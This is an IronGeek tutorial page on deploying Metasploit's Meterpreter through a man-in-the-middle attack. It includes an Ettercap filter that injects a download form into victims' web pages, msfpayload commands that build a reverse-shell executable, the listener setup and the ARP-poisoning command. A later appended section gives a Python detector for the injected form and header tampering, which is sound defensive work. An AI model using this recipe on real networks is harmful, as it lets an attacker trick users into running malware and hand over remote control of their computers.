Deploying Metasploit's Meterpreter with MITM and an Ettercap filter (Hacking Illustrated Series InfoSec Tutorial Videos)



In this video, Bigmac shows how to redirect web traffic and trick users into downloading Meterpreter and running it on their box.

 
ettercap filter html injection. meterpreter payload from bigmac on Vimeo.

 

Save this as html.filter:
 

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");
      }
}

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form
 action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
           msg("html injected");
      }}

 

-create the meterpeter.exe-
(open msfconsole)
../msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

Now wait for someone on the network to download and execute meterpeter.exe, and you will have a reverse shell.
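
From the defender's side, html.filter leaves two artifacts in the HTTP stream: the request's Accept-Encoding header is overwritten with a same-length unknown name, and the response body grows past its declared Content-Length because the filter never rewrites that header. The following is an added detection example, not part of the original article or the video; the function names, the 192.0.2.10 address and the sample messages are constructed, and it assumes reassembled, uncompressed HTTP/1.x messages captured on the client side of the path.

```python
import re

KNOWN_ACCEPT = {b"accept", b"accept-charset", b"accept-encoding", b"accept-language"}
# A form placed directly after </title> whose action is an executable.
INJECTED_FORM = re.compile(rb"</title>\s*<form[^>]*action=[\"']?([^\"'\s>]+\.exe)", re.I)

def split_message(raw):
    """Split a raw HTTP/1.x message into (lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request/status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def check_request(raw):
    """Flag a request whose Accept-Encoding header was overwritten in place."""
    headers, _ = split_message(raw)
    odd = [n for n in headers if n.startswith(b"accept-") and n not in KNOWN_ACCEPT]
    if b"accept-encoding" not in headers and odd:
        return ["unknown header %s replaces Accept-Encoding" % odd[0].decode()]
    return []

def check_response(raw):
    """Flag a body that grew in transit or carries a form pointing at an .exe."""
    headers, body = split_message(raw)
    findings = []
    declared = headers.get(b"content-length")
    if declared is not None and declared.isdigit() and len(body) > int(declared):
        findings.append("body is %d bytes over Content-Length" % (len(body) - int(declared)))
    m = INJECTED_FORM.search(body)
    if m:
        findings.append("form after </title> targets " + m.group(1).decode())
    return findings

# Constructed samples: a clean exchange, then the same messages after tampering.
PAGE = b"<html><head><title>Home</title></head><body>hi</body></html>"
CLEAN_RESP = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (len(PAGE), PAGE)
TAMPERED_RESP = CLEAN_RESP.replace(
    b"</title>", b'</title><form action="http://192.0.2.10/update.exe" method="link"></form>')
CLEAN_REQ = b"GET / HTTP/1.1\r\nHost: example.test\r\nAccept-Encoding: gzip\r\n\r\n"
TAMPERED_REQ = CLEAN_REQ.replace(b"Accept-Encoding", b"Accept-Nothing!")

if __name__ == "__main__":
    for label, msg in (("clean", CLEAN_REQ), ("tampered", TAMPERED_REQ)):
        print("request ", label, check_request(msg))
    for label, msg in (("clean", CLEAN_RESP), ("tampered", TAMPERED_RESP)):
        print("response", label, check_response(msg))
```

Responses sent with chunked transfer encoding carry no Content-Length, so only the form check applies to them; serving pages over HTTPS removes the plaintext stream the filter depends on.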

 


Copyright 2014, IronGeek